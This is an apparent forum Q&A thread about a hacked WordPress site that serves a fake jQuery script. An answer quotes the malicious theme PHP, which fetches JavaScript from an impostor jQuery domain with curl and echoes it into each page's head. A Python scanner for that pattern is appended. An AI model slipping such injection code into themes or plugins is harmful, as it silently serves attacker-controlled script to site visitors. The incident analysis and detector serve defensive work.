My site has been hacked and I can't for the life of me find where it was injected. I have taken necessary precautions to make sure it doesn't happen again and I am restoring my site to an earlier time from backup, but I would like to know where to find it in case it happens to another site I host.
this is the malicious script: http://www.jquerys/ajax/libs/jquery/jquery-1.6.3.min.js
This is the site: (removed now)
I have checked everywhere for it and have not been successful.
Any help would be greatly appreciated.
Thank you.
**for those of you down voting me, I have done a lot of research on trying to fix this myself over the last 4 hours with an 11 month old on my lap. I only posted the question as a last resort because I have not been successful in doing it on my own. Since I have had great help in the past from people here, I thought it couldn't hurt to ask.
asked Aug 2, 2012 at 21:25 by Leah; edited Oct 24, 2013 at 7:18 by Kapil
- 3 If you don't know where it has been injected, how can you know that you have taken the necessary precautions? – Waleed Khan Commented Aug 2, 2012 at 21:28
- 1 Furthermore, if you have restored to an earlier version, how can one expect to find the offending script? – Waleed Khan Commented Aug 2, 2012 at 21:30
- 2 The script is still in the source of the page on line 69. Either it was incorrectly typed, or the source files for the website were compromised. Or (sorry to say) this is an attempt to get SO users redirected to a site from the malicious script. – Tim M. Commented Aug 2, 2012 at 21:31
- 3 Try either commenting the code out completely (for test purposes), or changing the URL to a legit CDN, like: ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js – Tim M. Commented Aug 2, 2012 at 21:48
- 2 No problem...you should check if the template was bad from the start. If so, you probably shouldn't restore a backup (or remove the bad code when you restore). If not, then it probably means that access to your site was compromised and someone or something (like a plugin) added the script reference. – Tim M. Commented Aug 2, 2012 at 22:00
1 Answer
Writing up all the comments as an answer, as there is good info here to combat an exploit.
Problem
A script with a URL posing as a jQuery CDN was found in the source of a Wordpress-driven site. It sounds like both jquerys. and jqueryc. were being used as imposter domains.
The malicious code is simple; it randomly redirects to another site and sets a cookie to prevent immediate redirection (once a day). Since it is infrequent, it would be possible to never see this while developing the site, or to overlook it.
Possible Causes
- A mistake typing the URL
- Compromised server
- A malicious theme
- A malicious plugin
Resolution
Start with: http://codex.wordpress.org/FAQ_My_site_was_hacked
OP found this code inside the theme:
```php
// !!! Suspect Code - Do not use for any purpose !!!
//Jquery Function
if (!function_exists('insert_jquery_theme')){
    function insert_jquery_theme(){
        if (function_exists('curl_init')){
            $url="jqueryc./jquery-1.6.3.min.js";
            $ch = curl_init();
            $timeout = 5;
            curl_setopt($ch, CURLOPT_URL, $url);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
            $data = curl_exec($ch);
            curl_close($ch);
            echo $data;
        }
    }
    add_action('wp_head', 'insert_jquery_theme');
}
```
Viewing the source, there are actually two references to jQuery; one legitimate and one not. Removing the aforementioned snippet of code resolves the problem.
It will still be important to determine the origin of the malicious code (e.g. the theme, a plugin, or a compromised server). Backups shouldn't be restored without examining them for the malicious code.
Related Links
- an invalid ticket in the jQuery bugtracker
- WordPress support forum
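
A scanner for the pattern this answer describes, as an added example (not part of the original answer or of WordPress): it flags quoted `.js` references whose host contains "jquery" but is not on an allowlist, and PHP files that fetch remote content and echo it from a `wp_head`/`wp_footer` hook. The allowlist, the function names and the sample file are assumptions made for illustration.

```python
import re
from pathlib import Path
from urllib.parse import urlparse

# Assumption: the only hosts this site should load jQuery from; adjust per site.
ALLOWED_JQUERY_HOSTS = {"code.jquery.com", "ajax.googleapis.com"}
# Quoted string that is a URL, protocol-relative URL or bare host/path ending in .js
STRING_RE = re.compile(r"""["']((?:https?:)?(?://)?[\w.-]+/[^"'\s]*\.js)["']""", re.I)
# Remote fetches whose response a theme could print straight into the page
FETCH_RE = re.compile(r"\b(curl_exec|file_get_contents|wp_remote_get)\s*\(")
HOOK_RE = re.compile(r"add_action\s*\(\s*['\"](wp_head|wp_footer)['\"]")

def host_of(ref):
    """Lowercase host of a URL, protocol-relative URL or bare host/path."""
    if "//" not in ref:
        ref = "//" + ref  # make urlparse treat the first segment as the host
    return (urlparse(ref).hostname or "").lower()

def scan_php(text):
    """Return (line, rule, detail) findings for one PHP source string."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        for ref in STRING_RE.findall(line):
            host = host_of(ref)
            # The dot test skips relative paths such as 'jquery/plugin.js'
            if "jquery" in host and "." in host and host not in ALLOWED_JQUERY_HOSTS:
                findings.append((n, "lookalike-jquery-host", host))
    # File-level heuristic (line 0): remote fetch + echo + head/footer hook
    fetch = FETCH_RE.search(text)
    if fetch and HOOK_RE.search(text) and re.search(r"\becho\b", text):
        findings.append((0, "remote-fetch-echoed-in-head", fetch.group(1)))
    return findings

def scan_tree(root):
    """Scan every .php file under root, e.g. wp-content/themes or a backup."""
    return {str(p): f for p in sorted(Path(root).rglob("*.php"))
            if (f := scan_php(p.read_text(encoding="utf-8", errors="replace")))}
# Constructed sample, modelled on the theme snippet quoted in the answer.
SAMPLE = '''<?php
function insert_jquery_theme(){
    $url="jqueryc./jquery-1.6.3.min.js";
    curl_setopt($ch, CURLOPT_URL, $url);
    echo curl_exec($ch);
}
add_action('wp_head', 'insert_jquery_theme');
wp_enqueue_script('jquery', 'https://code.jquery.com/jquery-1.6.3.min.js');
'''
if __name__ == "__main__":
    print(scan_php(SAMPLE))
```

Running `scan_tree` over an extracted backup before restoring it covers the answer's last point; a hit is a lead to read the file, not proof of compromise.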